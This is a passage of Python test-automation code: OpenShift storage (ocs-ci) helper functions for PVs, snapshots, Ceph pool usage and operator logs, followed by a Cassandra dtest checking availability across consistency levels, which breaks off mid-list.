list: list of pv's size
"""
return_list = []
ocp_obj = ocp.OCP(kind=constants.PV)
pv_objs = ocp_obj.get()["items"]
for pv_obj in pv_objs:
if pv_obj["spec"]["storageClassName"] == storageclass:
return_list.append(pv_obj["spec"]["capacity"]["storage"])
return return_list
def get_pv_names():
"""
Get Pv names
Returns:
list: list of pv names
"""
ocp_obj = ocp.OCP(kind=constants.PV)
pv_objs = ocp_obj.get()["items"]
return [pv_obj["metadata"]["name"] for pv_obj in pv_objs]
def default_volumesnapshotclass(interface_type):
"""
Return default VolumeSnapshotClass based on interface_type
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
Returns:
OCS: VolumeSnapshotClass Instance
"""
external = config.DEPLOYMENT["external_mode"]
if interface_type == constants.CEPHBLOCKPOOL:
resource_name = (
constants.DEFAULT_EXTERNAL_MODE_VOLUMESNAPSHOTCLASS_RBD
if external
else constants.DEFAULT_VOLUMESNAPSHOTCLASS_RBD
)
elif interface_type == constants.CEPHFILESYSTEM:
resource_name = (
constants.DEFAULT_EXTERNAL_MODE_VOLUMESNAPSHOTCLASS_CEPHFS
if external
else constants.DEFAULT_VOLUMESNAPSHOTCLASS_CEPHFS
)
base_snapshot_class = OCP(
kind=constants.VOLUMESNAPSHOTCLASS, resource_name=resource_name
)
return OCS(**base_snapshot_class.data)
def get_snapshot_content_obj(snap_obj):
"""
Get volume snapshot content of a volume snapshot
Args:
snap_obj (OCS): OCS instance of kind VolumeSnapshot
Returns:
OCS: OCS instance of kind VolumeSnapshotContent
"""
data = dict()
data["api_version"] = snap_obj.api_version
data["kind"] = constants.VOLUMESNAPSHOTCONTENT
snapcontent = snap_obj.ocp.get(resource_name=snap_obj.name, out_yaml_format=True)[
"status"
]["boundVolumeSnapshotContentName"]
data["metadata"] = {"name": snapcontent, "namespace": snap_obj.namespace}
snapcontent_obj = OCS(**data)
snapcontent_obj.reload()
return snapcontent_obj
def wait_for_pv_delete(pv_objs):
"""
Wait for PVs to delete. Delete PVs having ReclaimPolicy 'Retain'
Args:
pv_objs (list): OCS instances of kind PersistentVolume
"""
for pv_obj in pv_objs:
if (
pv_obj.data.get("spec").get("persistentVolumeReclaimPolicy")
== constants.RECLAIM_POLICY_RETAIN
):
wait_for_resource_state(pv_obj, constants.STATUS_RELEASED)
pv_obj.delete()
pv_obj.ocp.wait_for_delete(resource_name=pv_obj.name, timeout=180)
@retry(UnexpectedBehaviour, tries=20, delay=10, backoff=1)
def fetch_used_size(cbp_name, exp_val=None):
"""
Fetch used size in the pool
Args:
exp_val(float): Expected size in GB
Returns:
float: Used size in GB
"""
ct_pod = pod.get_ceph_tools_pod()
rados_status = ct_pod.exec_ceph_cmd(ceph_cmd=f"rados df -p {cbp_name}")
size_bytes = rados_status["pools"][0]["size_bytes"]
# Convert size to GB
used_in_gb = float(format(size_bytes / constants.GB, ".4f"))
if exp_val and abs(exp_val - used_in_gb) > 1.5:
raise UnexpectedBehaviour(
f"Actual {used_in_gb} and expected size {exp_val} not "
f"matching. Retrying"
)
return used_in_gb
def get_full_test_logs_path(cname, fname=None):
"""
Getting the full path of the logs file for particular test
this function use the inspect module to find the name of the caller function, so it need
to be call once from the main test function.
the output is in the form of
ocsci_log_path/<full test file path>/<test filename>/<test class name>/<test function name>
Args:
cname (obj): the Class object which was run and called this function
fname (str): the function name for different tests log path
Return:
str : full path of the test logs relative to the ocs-ci base logs path
"""
# the module path relative to ocs-ci base path
log_file_name = (inspect.stack()[1][1]).replace(f"{os.getcwd()}/", "")
# The name of the class
mname = type(cname).__name__
if fname is None:
fname = inspect.stack()[1][3]
# the full log path (relative to ocs-ci base path)
full_log_path = f"{ocsci_log_path()}/{log_file_name}/{mname}/{fname}"
return full_log_path
def get_mon_pdb():
"""
Check for Mon PDB
Returns:
disruptions_allowed (int): Count of mon allowed disruption
min_available_mon (int): Count of minimum mon available
max_unavailable_mon (int): Count of maximun mon unavailable
"""
pdb_obj = OCP(
kind=constants.POD_DISRUPTION_BUDGET,
resource_name=constants.MON_PDB,
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
)
disruptions_allowed = pdb_obj.get().get("status").get("disruptionsAllowed")
min_available_mon = pdb_obj.get().get("spec").get("minAvailable")
max_unavailable_mon = pdb_obj.get().get("spec").get("maxUnavailable")
return disruptions_allowed, min_available_mon, max_unavailable_mon
def verify_pdb_mon(disruptions_allowed, max_unavailable_mon):
"""
Compare between the PDB status and the expected PDB status
Args:
disruptions_allowed (int): the expected number of disruptions_allowed
max_unavailable_mon (int): the expected number of max_unavailable_mon
return:
bool: True if the expected pdb state equal to actual pdb state, False otherwise
"""
logging.info("Check mon pdb status")
mon_pdb = get_mon_pdb()
result = True
if disruptions_allowed != mon_pdb[0]:
result = False
logger.error(
f"The expected disruptions_allowed is: {disruptions_allowed}.The actual one is {mon_pdb[0]}"
)
if max_unavailable_mon != mon_pdb[2]:
result = False
logger.error(
f"The expected max_unavailable_mon is {max_unavailable_mon}.The actual one is {mon_pdb[2]}"
)
return result
@retry(CommandFailed, tries=10, delay=30, backoff=1)
def run_cmd_verify_cli_output(
cmd=None, expected_output_lst=(), cephtool_cmd=False, debug_node=None
):
"""
Run command and verify its output
Args:
cmd(str): cli command
expected_output_lst(set): A set of strings that need to be included in the command output.
cephtool_cmd(bool): command on ceph-tool pod
debug_node(str): name of node
Returns:
bool: True of all strings are included in the command output, False otherwise
"""
if cephtool_cmd is True:
tool_pod = pod.get_ceph_tools_pod()
cmd_start = f"oc rsh -n openshift-storage {tool_pod.name} "
cmd = f"{cmd_start} {cmd}"
elif debug_node is not None:
cmd_start = f"oc debug nodes/{debug_node} -- chroot /host /bin/bash -c "
cmd = f'{cmd_start} "{cmd}"'
out = run_cmd(cmd=cmd)
logger.info(out)
for expected_output in expected_output_lst:
if expected_output not in out:
return False
return True
def check_rbd_image_used_size(
pvc_objs, usage_to_compare, rbd_pool=constants.DEFAULT_BLOCKPOOL, expect_match=True
):
"""
Check if RBD image used size of the PVCs are matching with the given value
Args:
pvc_objs (list): List of PVC objects
usage_to_compare (str): Value of image used size to be compared with actual value. eg: "5GiB"
rbd_pool (str): Name of the pool
expect_match (bool): True to verify the used size is equal to 'usage_to_compare' value.
False to verify the used size is not equal to 'usage_to_compare' value.
Returns:
bool: True if the verification is success for all the PVCs, False otherwise
"""
ct_pod = pod.get_ceph_tools_pod()
no_match_list = []
for pvc_obj in pvc_objs:
rbd_image_name = pvc_obj.get_rbd_image_name
du_out = ct_pod.exec_ceph_cmd(
ceph_cmd=f"rbd du -p {rbd_pool} {rbd_image_name}",
format="",
)
used_size = "".join(du_out.strip().split()[-2:])
if expect_match:
if usage_to_compare != used_size:
logger.error(
f"Rbd image {rbd_image_name} of PVC {pvc_obj.name} did not meet the expectation."
f" Expected used size: {usage_to_compare}. Actual used size: {used_size}. "
f"Rbd du out: {du_out}"
)
no_match_list.append(pvc_obj.name)
else:
if usage_to_compare == used_size:
logger.error(
f"Rbd image {rbd_image_name} of PVC {pvc_obj.name} did not meet the expectation. "
f"Expected the used size to be diferent than {usage_to_compare}. "
f"Actual used size: {used_size}. Rbd du out: {du_out}"
)
no_match_list.append(pvc_obj.name)
if no_match_list:
logger.error(
f"RBD image used size of these PVCs did not meet the expectation - {no_match_list}"
)
return False
return True
def set_configmap_log_level_rook_ceph_operator(value):
"""
Set ROOK_LOG_LEVEL on configmap of rook-ceph-operator
Args:
value (str): type of log
"""
path = "/data/ROOK_LOG_LEVEL"
params = f"""[{{"op": "add", "path": "{path}", "value": "{value}"}}]"""
configmap_obj = OCP(
kind=constants.CONFIGMAP,
namespace=constants.OPENSHIFT_STORAGE_NAMESPACE,
resource_name=constants.ROOK_OPERATOR_CONFIGMAP,
)
logger.info(f"Setting ROOK_LOG_LEVEL to: {value}")
configmap_obj.patch(params=params, format_type="json")
def get_logs_rook_ceph_operator():
"""
Get logs from a rook_ceph_operator pod
Returns:
str: Output from 'oc get logs rook-ceph-operator command
"""
logger.info("Get logs from rook_ceph_operator pod")
rook_ceph_operator_objs = pod.get_operator_pods()
return pod.get_pod_logs(pod_name=rook_ceph_operator_objs[0].name)
def check_osd_log_exist_on_rook_ceph_operator_pod(
last_log_date_time_obj, expected_strings=(), unexpected_strings=()
):
"""
Verify logs contain the expected strings and the logs do not
contain the unexpected strings
Args:
last_log_date_time_obj (datetime obj): type of log
expected_strings (list): verify the logs contain the expected strings
unexpected_strings (list): verify the logs do not contain the strings
Returns:
bool: True if logs contain the expected strings and the logs do not
contain the unexpected strings, False otherwise
"""
logger.info("Respin OSD pod")
osd_pod_objs = pod.get_osd_pods()
osd_pod_obj = random.choice(osd_pod_objs)
osd_pod_obj.delete()
new_logs = list()
rook_ceph_operator_logs = get_logs_rook_ceph_operator()
for line in rook_ceph_operator_logs.splitlines():
log_date_time_obj = get_event_line_datetime(line)
if log_date_time_obj and log_date_time_obj > last_log_date_time_obj:
new_logs.append(line)
res_expected = False
res_unexpected = True
for new_log in new_logs:
if all(
expected_string.lower() in new_log.lower()
for expected_string in expected_strings
):
res_expected = True
logger.info(f"{new_log} contain expected strings {expected_strings}")
break
for new_log in new_logs:
if any(
unexpected_string.lower() in new_log.lower()
for unexpected_string in unexpected_strings
):
logger.error(f"{new_log} contain unexpected strings {unexpected_strings}")
res_unexpected = False
break
return res_expected & res_unexpected
def get_last_log_time_date():
"""
Get last log time
Returns:
last_log_date_time_obj (datetime obj): type of log
"""
logger.info("Get last log time")
rook_ceph_operator_logs = get_logs_rook_ceph_operator()
for line in rook_ceph_operator_logs.splitlines():
log_date_time_obj = get_event_line_datetime(line)
if log_date_time_obj:
last_log_date_time_obj = log_date_time_obj
return last_log_date_time_obj
def clear_crash_warning_and_osd_removal_leftovers():
"""
Clear crash warnings and osd removal leftovers. This function can be used for example,
after the device replacement test or the node replacement test.
"""
is_deleted = pod.delete_all_osd_removal_jobs()
if is_deleted:
logger.info("Successfully deleted all the ocs-osd-removal jobs")
is_osd_pods_running = pod.wait_for_pods_to_be_running(
pod_names=[osd_pod.name for osd_pod in pod.get_osd_pods()], timeout=120
)
if not is_osd_pods_running:
logger.warning("There are still osds down. Can't clear ceph crash warnings")
return
is_daemon_recently_crash_warnings = run_cmd_verify_cli_output(
cmd="ceph health detail",
expected_output_lst={"HEALTH_WARN", "daemons have recently crashed"},
cephtool_cmd=True,
)
if is_daemon_recently_crash_warnings:
logger.info("Clear all ceph crash warnings")
ct_pod = pod.get_ceph_tools_pod()
ct_pod.exec_ceph_cmd(ceph_cmd="ceph crash archive-all")
else:
logger.info("There are no daemon crash warnings")
def get_noobaa_url():
"""
Get the URL of noobaa console
Returns:
str: url of noobaa console
"""
ocp_obj = OCP(kind=constants.ROUTE, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
route_obj = ocp_obj.get(resource_name="noobaa-mgmt")
return route_obj["spec"]["host"]
def select_unique_pvcs(pvcs):
"""
Get the PVCs with unique access mode and volume mode combination.
Args:
pvcs(list): List of PVC objects
Returns:
list: List of selected PVC objects
"""
pvc_dict = {}
for pvc_obj in pvcs:
pvc_data = pvc_obj.get()
access_mode_volume_mode = (
pvc_data["spec"]["accessModes"][0],
pvc_data["spec"].get("volumeMode"),
)
pvc_dict[access_mode_volume_mode] = pvc_dict.get(
access_mode_volume_mode, pvc_obj
)
return pvc_dict.values()
def mon_pods_running_on_same_node():
"""
Verifies two mons are running on same node
"""
mon_running_nodes = node.get_mon_running_nodes()
if len(mon_running_nodes) != len(set(mon_running_nodes)):
logger.error(f"Mons running on nodes: {mon_running_nodes}")
raise UnexpectedBehaviour("Two or more mons running on same node")
logger.info("Mons are running on different nodes")
def get_failure_domain():
"""
Get Failure Domain
Returns:
string: type of failure domain
"""
from ocs_ci.ocs.resources.storage_cluster import get_storage_cluster
storage_cluster_obj = get_storage_cluster()
return storage_cluster_obj.data["items"][0]["status"]["failureDomain"]
def modify_statefulset_replica_count(statefulset_name, replica_count):
"""
Function to modify statefulset replica count,
i.e to scale up or down statefulset
Args:
statefulset_namee (str): Name of statefulset
replica_count (int): replica count to be changed to
Returns:
bool: True in case if changes are applied. False otherwise
"""
ocp_obj = OCP(kind=constants.STATEFULSET, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
params = f'{{"spec": {{"replicas": {replica_count}}}}}'
return ocp_obj.patch(resource_name=statefulset_name, params=params)
def get_event_line_datetime(event_line):
"""
Get the event line datetime
Args:
event_line (str): The event line to get it's datetime
Returns:
datetime object: The event line datetime
"""
event_line_dt = None
regex = r"\d{4}-\d{2}-\d{2}"
if re.search(regex + "T", event_line):
dt_string = event_line[:23].replace("T", " ")
event_line_dt = datetime.datetime.strptime(dt_string, "%Y-%m-%d %H:%M:%S.%f")
elif re.search(regex, event_line):
dt_string = event_line[:26]
event_line_dt = datetime.datetime.strptime(dt_string, "%Y-%m-%d %H:%M:%S.%f")
return event_line_dt
def get_rook_ceph_pod_events(pod_name):
"""
Get the rook ceph pod events from the rook ceph pod operator logs
Args:
pod_name (str): The rook ceph pod name to get the events
Returns:
list: List of all the event lines with the specific pod
"""
rook_ceph_operator_event_lines = get_logs_rook_ceph_operator().splitlines()
return [line for line in rook_ceph_operator_event_lines if pod_name in line]
def get_rook_ceph_pod_events_by_keyword(pod_name, keyword):
"""
Get the rook ceph pod events with the keyword 'keyword' from the rook ceph pod operator logs
Args:
pod_name (str): The rook ceph pod name to get the events
keyword (str): The keyword to search in the events
Returns:
list: List of all the event lines with the specific pod that has the keyword 'keyword'
"""
pod_event_lines = get_rook_ceph_pod_events(pod_name)
return [
event_line
for event_line in pod_event_lines
if keyword.lower() in event_line.lower()
]
def wait_for_rook_ceph_pod_status(pod_obj, desired_status, timeout=420):
"""
Wait for the rook ceph pod to reach the desired status. If the pod didn't reach the
desired status, check if the reason is that the pod is not found. If this is the case,
check in the rook ceph pod operator logs to see if the pod reached the desired status.
Args:
pod_obj (ocs_ci.ocs.resources.pod.Pod): The rook ceph pod object
desired_status (str): The desired status of the pod to wait for
timeout (int): time to wait for the pod to reach the desired status
Returns:
bool: True if the rook ceph pod to reach the desired status. False, otherwise
"""
start_log_datetime = get_last_log_time_date()
try:
wait_for_resource_state(pod_obj, desired_status, timeout=timeout)
except (ResourceWrongStatusException, CommandFailed) as e:
if "not found" in str(e):
logger.info(
f"Failed to find the pod {pod_obj.name}. Trying to search for the event "
f"in rook ceph operator logs..."
)
pod_event_lines_with_desired_status = get_rook_ceph_pod_events_by_keyword(
pod_obj.name, keyword=desired_status
)
last_pod_event_line = pod_event_lines_with_desired_status[-1]
last_pod_event_datetime = get_event_line_datetime(last_pod_event_line)
if last_pod_event_datetime > start_log_datetime:
logger.info(
f"Found the event of pod {pod_obj.name} with status {desired_status} in "
f"rook ceph operator logs. The event line is: {last_pod_event_line}"
)
return True
else:
return False
else:
logger.info(f"An error has occurred when trying to get the pod object: {e}")
return False
return True
def check_number_of_mon_pods(expected_mon_num=3):
"""
Function to check the number of monitoring pods
Returns:
bool: True if number of mon pods is 3, False otherwise
"""
mon_pod_list = pod.get_mon_pods()
if len(mon_pod_list) == expected_mon_num:
logger.info(f"Number of mons equal to {expected_mon_num}")
return True
logger.error(f"Number of Mons not equal to {expected_mon_num} {mon_pod_list}")
return False
def get_secret_names(namespace=defaults.ROOK_CLUSTER_NAMESPACE, resource_name=""):
"""
Get secrets names
Args:
namespace (str): The name of the project.
resource_name (str): The resource name to fetch.
Returns:
dict: secret names
"""
logger.info(f"Get secret names on project {namespace}")
secret_obj = ocp.OCP(kind=constants.SECRET, namespace=namespace)
secrets_objs = secret_obj.get(resource_name=resource_name)
return [secret_obj["metadata"]["name"] for secret_obj in secrets_objs["items"]]
def check_rook_ceph_crashcollector_pods_where_rook_ceph_pods_are_running():
"""
check rook-ceph-crashcollector pods running on worker nodes
where rook-ceph pods are running.
Returns:
bool: True if the rook-ceph-crashcollector pods running on worker nodes
where rook-ceph pods are running. False otherwise.
"""
logger.info(
"check rook-ceph-crashcollector pods running on worker nodes "
"where rook-ceph pods are running."
)
logger.info(
f"crashcollector nodes: {node.get_crashcollector_nodes()}, "
f"nodes where ocs pods running: {node.get_nodes_where_ocs_pods_running()}"
)
res = sorted(node.get_crashcollector_nodes()) == sorted(
node.get_nodes_where_ocs_pods_running()
)
if not res:
logger.warning(
"rook-ceph-crashcollector pods are not running on worker nodes "
"where rook-ceph pods are running."
)
return res
def verify_rook_ceph_crashcollector_pods_where_rook_ceph_pods_are_running(timeout=90):
"""
Verify rook-ceph-crashcollector pods running on worker nodes
where rook-ceph pods are running.
Args:
timeout (int): time to wait for verifying
Returns:
bool: True if rook-ceph-crashcollector pods running on worker nodes
where rook-ceph pods are running in the given timeout. False otherwise.
"""
sample = TimeoutSampler(
timeout=timeout,
sleep=10,
func=check_rook_ceph_crashcollector_pods_where_rook_ceph_pods_are_running,
)
return sample.wait_for_func_status(result=True)
|
consistency_test.py | import queue
import sys
import threading
import time
import pytest
import logging
from collections import OrderedDict, namedtuple
from copy import deepcopy
from cassandra import ConsistencyLevel, consistency_value_to_name
from cassandra.query import BatchStatement, BatchType, SimpleStatement
from tools.assertions import (assert_all, assert_length_equal, assert_none,
assert_unavailable)
from dtest import MultiError, Tester, create_ks, create_cf
from tools.data import (create_c1c2_table, insert_c1c2, insert_columns,
query_c1c2, rows_to_list)
from tools.jmxutils import JolokiaAgent, make_mbean, remove_perf_disable_shared_mem
since = pytest.mark.since
logger = logging.getLogger(__name__)
ExpectedConsistency = namedtuple('ExpectedConsistency', ('num_write_nodes', 'num_read_nodes', 'is_strong'))
class TestHelper(Tester):
def _is_local(self, cl):
return (cl == ConsistencyLevel.LOCAL_QUORUM or
cl == ConsistencyLevel.LOCAL_ONE or
cl == ConsistencyLevel.LOCAL_SERIAL)
def _is_conditional(self, cl):
return (cl == ConsistencyLevel.SERIAL or
cl == ConsistencyLevel.LOCAL_SERIAL)
def _required_nodes(self, cl, rf_factors, dc):
"""
Return the number of nodes required by this consistency level
in the current data center, specified by the dc parameter,
given a list of replication factors, one per dc.
"""
return {
ConsistencyLevel.ANY: 1,
ConsistencyLevel.ONE: 1,
ConsistencyLevel.TWO: 2,
ConsistencyLevel.THREE: 3,
ConsistencyLevel.QUORUM: sum(rf_factors) // 2 + 1,
ConsistencyLevel.ALL: sum(rf_factors),
ConsistencyLevel.LOCAL_QUORUM: rf_factors[dc] // 2 + 1,
ConsistencyLevel.EACH_QUORUM: rf_factors[dc] // 2 + 1,
ConsistencyLevel.SERIAL: sum(rf_factors) // 2 + 1,
ConsistencyLevel.LOCAL_SERIAL: rf_factors[dc] // 2 + 1,
ConsistencyLevel.LOCAL_ONE: 1,
}[cl]
def get_expected_consistency(self, idx, rf_factors, write_cl, read_cl):
"""
Given a node index, identify to which data center we are connecting and return
the expected consistency: number of nodes we write to, read from, and whether
we should have strong consistency, that is whether R + W > N
"""
nodes = [self.nodes] if isinstance(self.nodes, int) else self.nodes
def get_data_center():
"""
:return: the data center corresponding to this node
"""
dc = 0
for i in range(1, len(nodes)):
if idx < sum(nodes[:i]):
break
dc += 1
return dc
data_center = get_data_center()
if write_cl == ConsistencyLevel.EACH_QUORUM:
write_nodes = sum([self._required_nodes(write_cl, rf_factors, i) for i in range(0, len(nodes))])
else:
write_nodes = self._required_nodes(write_cl, rf_factors, data_center)
read_nodes = self._required_nodes(read_cl, rf_factors, data_center)
is_strong = read_nodes + write_nodes > sum(rf_factors)
return ExpectedConsistency(num_write_nodes=write_nodes,
num_read_nodes=read_nodes,
is_strong=is_strong)
def _should_succeed(self, cl, rf_factors, num_nodes_alive, current):
"""
Return true if the read or write operation should succeed based on
the consistency level requested, the replication factors and the
number of nodes alive in each data center.
"""
if self._is_local(cl):
return num_nodes_alive[current] >= self._required_nodes(cl, rf_factors, current)
elif cl == ConsistencyLevel.EACH_QUORUM:
for i in range(0, len(rf_factors)):
if num_nodes_alive[i] < self._required_nodes(cl, rf_factors, i):
return False
return True
else:
return sum(num_nodes_alive) >= self._required_nodes(cl, rf_factors, current)
def _start_cluster(self, save_sessions=False, requires_local_reads=False):
cluster = self.cluster
nodes = self.nodes
rf = self.rf
configuration_options = {'hinted_handoff_enabled': False}
# If we must read from the local replica first, then the dynamic snitch poses a problem
# because occasionally it may think that another replica is preferable even if the
# coordinator is a replica
if requires_local_reads:
configuration_options['dynamic_snitch'] = False
cluster.set_configuration_options(values=configuration_options)
cluster.populate(nodes)
if requires_local_reads and isinstance(nodes, int):
# Changing the snitch to PropertyFileSnitch even in the
# single dc tests ensures that StorageProxy sorts the replicas eligible
# for reading by proximity to the local host, essentially picking the
# local host for local reads, see IEndpointSnitch.sortByProximity() and
# StorageProxy.getLiveSortedEndpoints(), which is called by the AbstractReadExecutor
# to determine the target replicas. The default case, a SimpleSnitch wrapped in
# a dynamic snitch, may rarely choose a different replica.
logger.debug('Changing snitch for single dc case')
for node in cluster.nodelist():
node.data_center = 'dc1'
cluster.set_configuration_options(values={
'endpoint_snitch': 'org.apache.cassandra.locator.PropertyFileSnitch'})
cluster.start(wait_for_binary_proto=True, wait_other_notice=True)
self.ksname = 'mytestks'
session = self.patient_exclusive_cql_connection(cluster.nodelist()[0])
create_ks(session, self.ksname, rf)
self.create_tables(session, requires_local_reads)
if save_sessions:
self.sessions = []
self.sessions.append(session)
for node in cluster.nodelist()[1:]:
self.sessions.append(self.patient_exclusive_cql_connection(node, self.ksname))
def create_tables(self, session, requires_local_reads):
self.create_users_table(session, requires_local_reads)
self.create_counters_table(session, requires_local_reads)
session.cluster.control_connection.wait_for_schema_agreement(wait_time=60)
def truncate_tables(self, session):
statement = SimpleStatement("TRUNCATE users", ConsistencyLevel.ALL)
session.execute(statement)
statement = SimpleStatement("TRUNCATE counters", ConsistencyLevel.ALL)
session.execute(statement)
def create_users_table(self, session, requires_local_reads):
create_cmd = """
CREATE TABLE users (
userid int PRIMARY KEY,
firstname text,
lastname text,
age int
)"""
if requires_local_reads:
create_cmd += " WITH " + self.get_local_reads_properties(self.cluster.version())
session.execute(create_cmd)
@staticmethod
def get_local_reads_properties(cluster_version):
"""
If we must read from the local replica first, then we should disable read repair and
speculative retry, see CASSANDRA-12092
"""
if cluster_version < '4.0':
return " dclocal_read_repair_chance = 0 AND read_repair_chance = 0 AND speculative_retry = 'NONE'"
else:
return " speculative_retry = 'NONE'"
def insert_user(self, session, userid, age, consistency, serial_consistency=None):
text = "INSERT INTO users (userid, firstname, lastname, age) VALUES ({}, 'first{}', 'last{}', {}) {}"\
.format(userid, userid, userid, age, "IF NOT EXISTS" if serial_consistency else "")
statement = SimpleStatement(text, consistency_level=consistency, serial_consistency_level=serial_consistency)
session.execute(statement)
def update_user(self, session, userid, age, consistency, serial_consistency=None, prev_age=None):
text = "UPDATE users SET age = {} WHERE userid = {}".format(age, userid)
if serial_consistency and prev_age:
text = text + " IF age = {}".format(prev_age)
statement = SimpleStatement(text, consistency_level=consistency, serial_consistency_level=serial_consistency)
session.execute(statement)
def delete_user(self, session, userid, consistency):
statement = SimpleStatement("DELETE FROM users where userid = {}".format(userid), consistency_level=consistency)
session.execute(statement)
def query_user(self, session, userid, age, consistency, check_ret=True):
statement = SimpleStatement("SELECT userid, age FROM users where userid = {}".format(userid), consistency_level=consistency)
res = session.execute(statement)
expected = [[userid, age]] if age else []
ret = rows_to_list(res) == expected
if check_ret:
assert ret, "Got {} from {}, expected {} at {}".format(rows_to_list(res), session.cluster.contact_points, expected, consistency_value_to_name(consistency))
return ret
def create_counters_table(self, session, requires_local_reads):
create_cmd = """
CREATE TABLE counters (
id int PRIMARY KEY,
c counter
)"""
if requires_local_reads:
create_cmd += " WITH " + self.get_local_reads_properties(self.cluster.version())
session.execute(create_cmd)
def update_counter(self, session, id, consistency, serial_consistency=None):
text = "UPDATE counters SET c = c + 1 WHERE id = {}".format(id)
statement = SimpleStatement(text, consistency_level=consistency, serial_consistency_level=serial_consistency)
session.execute(statement)
return statement
def query_counter(self, session, id, val, consistency, check_ret=True):
statement = SimpleStatement("SELECT * from counters WHERE id = {}".format(id), consistency_level=consistency)
ret = rows_to_list(session.execute(statement))
if check_ret:
assert ret[0][1] == val, "Got {} from {}, expected {} at {}".format(ret[0][1],
session.cluster.contact_points,
val,
consistency_value_to_name(consistency))
return ret[0][1] if ret else 0
class TestAvailability(TestHelper):
"""
Test that we can read and write depending on the number of nodes that are alive and the consistency levels.
"""
def _test_simple_strategy(self, combinations):
"""
Helper test function for a single data center: invoke _test_insert_query_from_node() for each node
and each combination, progressively stopping nodes.
"""
cluster = self.cluster
nodes = self.nodes
rf = self.rf
num_alive = nodes
for node in range(nodes):
logger.debug('Testing node {} in single dc with {} nodes alive'.format(node, num_alive))
session = self.patient_exclusive_cql_connection(cluster.nodelist()[node], self.ksname)
for combination in combinations:
self._test_insert_query_from_node(session, 0, [rf], [num_alive], *combination)
self.cluster.nodelist()[node].stop()
num_alive -= 1
def _test_network_topology_strategy(self, combinations):
"""
Helper test function for multiple data centers, invoke _test_insert_query_from_node() for each node
in each dc and each combination, progressively stopping nodes.
"""
cluster = self.cluster
nodes = self.nodes
rf = self.rf
nodes_alive = deepcopy(nodes)
rf_factors = list(rf.values())
for i in range(0, len(nodes)): # for each dc
logger.debug('Testing dc {} with rf {} and {} nodes alive'.format(i, rf_factors[i], nodes_alive))
for n in range(nodes[i]): # for each node in this dc
logger.debug('Testing node {} in dc {} with {} nodes alive'.format(n, i, nodes_alive))
node = n + sum(nodes[:i])
session = self.patient_exclusive_cql_connection(cluster.nodelist()[node], self.ksname)
for combination in combinations:
self._test_insert_query_from_node(session, i, rf_factors, nodes_alive, *combination)
self.cluster.nodelist()[node].stop(wait_other_notice=True)
nodes_alive[i] -= 1
def _test_insert_query_from_node(self, session, dc_idx, rf_factors, num_nodes_alive, write_cl, read_cl, serial_cl=None, check_ret=True):
"""
Test availability for read and write via the session passed in as a parameter.
"""
logger.debug("Connected to %s for %s/%s/%s" %
(session.cluster.contact_points, consistency_value_to_name(write_cl), consistency_value_to_name(read_cl), consistency_value_to_name(serial_cl)))
start = 0
end = 100
age = 30
if self._should_succeed(write_cl, rf_factors, num_nodes_alive, dc_idx):
for n in range(start, end):
self.insert_user(session, n, age, write_cl, serial_cl)
else:
assert_unavailable(self.insert_user, session, end, age, write_cl, serial_cl)
if self._should_succeed(read_cl, rf_factors, num_nodes_alive, dc_idx):
for n in range(start, end):
self.query_user(session, n, age, read_cl, check_ret)
else:
assert_unavailable(self.query_user, session, end, age, read_cl, check_ret)
def test_simple_strategy(self):
"""
Test for a single datacenter, using simple replication strategy.
"""
self.nodes = 3
self.rf = 3
self._start_cluster()
combinations = [
(ConsistencyLevel.ALL, ConsistencyLevel.ALL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.QUORUM),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.ONE, ConsistencyLevel.ONE, None, False),
(ConsistencyLevel.ONE, ConsistencyLevel.ALL),
(ConsistencyLevel.ALL, ConsistencyLevel.ONE),
(ConsistencyLevel.QUORUM, ConsistencyLevel.TWO),
(ConsistencyLevel.QUORUM, ConsistencyLevel.THREE),
(ConsistencyLevel.TWO, ConsistencyLevel.TWO),
(ConsistencyLevel.THREE, ConsistencyLevel.ONE),
(ConsistencyLevel.ANY, ConsistencyLevel.ONE, None, False),
(ConsistencyLevel.LOCAL_ONE, ConsistencyLevel.LOCAL_ONE, None, False),
(ConsistencyLevel.QUORUM, ConsistencyLevel.SERIAL, ConsistencyLevel.SERIAL),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.LOCAL_SERIAL, ConsistencyLevel.LOCAL_SERIAL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.LOCAL_SERIAL, ConsistencyLevel.SERIAL),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.SERIAL, ConsistencyLevel.LOCAL_SERIAL),
]
self._test_simple_strategy(combinations)
@since("3.0")
def test_simple_strategy_each_quorum(self):
"""
@jira_ticket CASSANDRA-10584
Test for a single datacenter, using simple replication strategy, only
the each quorum reads.
"""
self.nodes = 3
self.rf = 3
self._start_cluster()
combinations = [
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.EACH_QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.EACH_QUORUM),
]
self._test_simple_strategy(combinations)
@pytest.mark.resource_intensive
def test_network_topology_strategy(self):
"""
Test for multiple datacenters, using network topology replication strategy.
"""
self.nodes = [3, 3, 3]
self.rf = OrderedDict([('dc1', 3), ('dc2', 3), ('dc3', 3)])
self._start_cluster()
combinations = [
(ConsistencyLevel.ALL, ConsistencyLevel.ALL),
(ConsistencyLevel.QUORUM, ConsistencyLevel.QUORUM),
(ConsistencyLevel.LOCAL_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.EACH_QUORUM, ConsistencyLevel.LOCAL_QUORUM),
(ConsistencyLevel.ONE, ConsistencyLevel.ONE, None, False),
(ConsistencyLevel.ONE, ConsistencyLevel.ALL),
(ConsistencyLevel.ALL, ConsistencyLevel.ONE),
(ConsistencyLevel.QUORUM, ConsistencyLevel.TWO),
(ConsistencyLevel.QUORUM, ConsistencyLevel.THREE),
(ConsistencyLevel.TWO, ConsistencyLevel.TWO),
(ConsistencyLevel.THREE, ConsistencyLevel.ONE),
(ConsistencyLevel.ANY, ConsistencyLevel.ONE, None, False),
(ConsistencyLevel.LOCAL_ONE, ConsistencyLevel.LOCAL_ONE, None, False),
(ConsistencyLevel.QUORUM, ConsistencyLevel.SERIAL, ConsistencyLevel.SERIAL),
